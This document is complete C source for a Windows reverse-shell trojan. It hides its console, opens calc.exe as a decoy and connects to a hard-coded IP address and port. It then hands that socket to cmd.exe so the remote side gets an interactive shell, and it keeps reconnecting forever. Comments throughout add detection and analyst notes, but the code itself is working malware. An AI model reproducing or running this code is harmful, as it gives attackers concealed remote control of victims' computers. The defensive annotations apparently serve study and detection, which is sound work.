// AUTHOR : #Captain_Nemo
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib") // indicates to the linker that the Ws2_32.lib file is required
#define DEF_BUFF 2048
// Reverse-shell worker (Win32/Winsock).  Connects out to server:Port and hands
// the connected socket to a child cmd.exe as its stdin/stdout/stderr, so the
// remote listener drives an interactive shell.  Never returns normally: the
// loop runs forever and the only exit path is the remote peer sending "exit\n".
//
// Analyst / detection notes (everything below is visible in this function):
//  - Outbound TCP connect to a hard-coded peer supplied by main().
//  - cmd.exe is created with bInheritHandles = TRUE and STARTF_USESTDHANDLES,
//    with a SOCKET cast to HANDLE for all three std handles.  A console-less
//    process spawning cmd.exe whose std handles are a socket is the classic
//    reverse-shell process-tree signature.
//  - No back-off on failure: when the listener is down the loop immediately
//    re-runs WSAStartup/connect, so host firewall and netflow logs show a tight
//    burst of repeated connection attempts to the same address:port.
//  - None of the Winsock / CreateProcess return values are checked.
//
// Parameters:
//   server - dotted-quad IPv4 string, parsed with inet_addr() (IPv4 only).
//   Port   - TCP port in host byte order; converted with htons().
void rsh(char* server, int Port)
{
while(true)
{
SOCKET sock1;
sockaddr_in address;
WSADATA ver;
WSAStartup(MAKEWORD(2,2), &ver); // re-initialised on every iteration (paired with WSACleanup below)
sock1 = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); //create | initialize socket
address.sin_family = AF_INET; // std socket def
address.sin_addr.s_addr = inet_addr(server); // std socket def & initializing the ip from main() function
address.sin_port = htons(Port); // std socket def & initializing the port from main() function
WSAConnect(sock1, (SOCKADDR*)&address, sizeof(address), NULL, NULL, NULL, NULL); // Call WSAConnect Function for socket bind
// First receive acts as a "go" signal from the listener: the shell is only
// spawned after the peer has sent at least one byte.
char Rec_dat[DEF_BUFF];
memset(Rec_dat, 0, sizeof(Rec_dat));
int Rec_code = recv(sock1, Rec_dat, DEF_BUFF, 0); // define recieve code
if (Rec_code <= 0) {
// Connection failed or peer closed: tear down and retry immediately.
closesocket(sock1);
WSACleanup();
continue;
} // end if
else {
char Proc[] = "cmd.exe"; // define process to be called
STARTUPINFO str_in;
PROCESS_INFORMATION proc_in;
memset(&str_in, 0, sizeof(str_in));
str_in.cb = sizeof(str_in);
str_in.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
// The SOCKET itself is used as the child's std handles; with
// bInheritHandles = TRUE below the child inherits it directly.
str_in.hStdInput = str_in.hStdOutput = str_in.hStdError = (HANDLE) sock1; // passing process handle to socket
CreateProcess(NULL, Proc, NULL, NULL, TRUE, 0, NULL, NULL, &str_in, &proc_in); // create process cmd
// Parent blocks here for the lifetime of the shell session.
WaitForSingleObject(proc_in.hProcess, INFINITE);
CloseHandle(proc_in.hProcess);
CloseHandle(proc_in.hThread);
// After cmd.exe exits, one more message is read on the same socket.
// NOTE: this inner Rec_code shadows the one declared above.
memset(Rec_dat, 0, sizeof(Rec_dat));
int Rec_code = recv(sock1, Rec_dat, DEF_BUFF, 0);
if (Rec_code <= 0)
{
closesocket(sock1);
WSACleanup();
continue;
} // end if
// Exact match on "exit\n" (including the trailing newline) terminates the
// whole process; anything else falls through and the loop reconnects
// without closing sock1 (the handle leaks on this path).
if (strcmp(Rec_dat, "exit\n") == 0)
{
exit(0);
} // end if
} //end else
} // end while
} // end method rsh
// Entry point.  Detaches from the console, launches a visible decoy process,
// then hands control to rsh(), which never returns normally (it loops forever
// and leaves only via exit(0)), so `return 0` is effectively unreachable.
//
// Static indicators in this function (hard-coded, not derived at runtime):
//  - peer address 192.168.225.197, TCP port 8080 (passed to rsh());
//  - `system("start ...calc.exe")`: spawns a cmd.exe child (system() goes
//    through the command interpreter) which in turn starts calc.exe — a
//    console-less parent launching cmd.exe -> calc.exe immediately followed
//    by an outbound connection is the process-tree pattern to hunt for;
//  - FreeConsole(): no console window is attached while the binary runs.
int main() {
FreeConsole(); // clear console || allow trojan to run in the background
char h[] = "192.168.225.197"; // change the ip as per your own system's
int p = 8080;
system("start C:\\WINDOWS\\System32\\calc.exe"); // firing decoy process.
rsh(h, p); // does not return; see rsh()
return 0;
}